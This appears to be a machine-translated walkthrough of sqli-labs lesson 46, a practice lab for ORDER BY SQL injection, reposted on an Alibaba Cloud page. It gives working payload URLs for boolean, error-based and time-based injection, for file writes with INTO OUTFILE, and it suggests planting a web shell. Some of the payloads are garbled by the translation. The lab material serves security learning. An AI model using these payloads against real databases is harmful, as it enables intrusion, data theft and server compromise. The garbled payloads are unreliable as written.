Sqli-labs less 46

Source: Internet
Author: User

Less-46

Starting with this, we begin to learn about order by related injections.

The SQL statement for this is $sql = "SELECT * from the Users ORDER by $id";

Try? sort=1 DESC or ASC, which shows different results, indicates that it can be injected. (Ascending or descending sort)

From the SQL statements above, we can see that our injection point is in the argument after the order by, and the order by is different from the injection point in the where, we cannot inject with union. How to inject the order by, let's first look at the documentation for the MySQL official select.

We can inject it with some parameters after order by.

First of all

(1), the number after order by can be used as an injection point. That is, to construct a statement after the order by, so that the statement executes the result as a number, we try to

Http://127.0.0.1/sqli-labs/Less-46/?sort=right (Version (), 1)

No error, but right to left is the same, stating that the number does not work, we consider the Boolean type. At this point we can use error injection and delay injection.

Here you can directly construct a parameter following the sort=. In this case, we can have three forms,

① Add injection statement directly, sort= (select ******)

② uses some functions. such as the rand () function, etc.. Sort=rand (SQL statement)

Ps: Here we can show that the results of Rand (ture) and Rand (FALSE) are not the same.

③ uses and, for example, Sort=1 and (plus SQL statements).

At the same time, the SQL statement can use the method of error injection and delay injection, we can construct the statement flexibly.

Example of error injection

Http://127.0.0.1/sqli-labs/Less-46/?sort= (Select%20count (*)%20from%20information_schema.columns%20group%20by% 20concat (0x3a,0x3a, (Select%20user ()), 0x3a,0x3a,floor (rand ()))

In the example above, you can see the user name of [email protected]

?

Next we'll use Rand () for a demonstration because the above mentioned rand (TRUE) and rand (FALSE) results are not the same.

Http://127.0.0.1/sqli-labs/Less-46/?sort=rand (ASCII (Left (database (), 1)) =115)

?

?

Http://127.0.0.1/sqli-labs/Less-46/?sort=rand (ASCII (Left (database (), 1)) =116)

?

From the results of the above two graphs, comparing rand (ture) and Rand (FALSE) results, it can be seen that error injection is successful.

?

Delay Injection Example

Http://127.0.0.1/sqli-labs/Less-46/?sort=%20 (Select%20if (SUBSTRING (current,1,1) =char (), BENCHMARK (50000000, MD5 (%271%27)), null)%20from%20 (Select%20database ()%20as%20current)%20as%20tb1)

?

Http://127.0.0.1/sqllib/Less-46/?sort=1%20and%20If (ASCII (substr () (Database ()) =116,0,sleep (5))

The above two delay injection examples can be very obvious to see the difference in time, here is not the map, the picture can not show the delay ...

?

You can also add injection statements using the sort=1 and after. This is not a demonstration.

    1. Procedure analyse parameter after injection

      Using the procedure analyse parameter, we can perform an error injection. At the same time, there can be a limit parameter between procedure analyse and order by, and in practice we may also have a limit injection, which can be injected using procedure analyse.

      The following is a sample example

      Http://127.0.0.1/sqli-labs/Less-46/?sort=1%20%20procedure%20analyse (Extractvalue (rand (), concat (0x3a,version ()) ), 1)

    2. Import export file into outfile parameter

      Http://127.0.0.1/sqllib/less-46/?sort=1%20into%20outfile%20%22c:\\wamp\\www\\sqllib\\test1.txt%22

      Import query results into a file

      At this time we can consider uploading the Web horse, using lines terminated by.

      into Outtfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x (web horse for 16 binary conversion)

Sqli-labs less 46

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.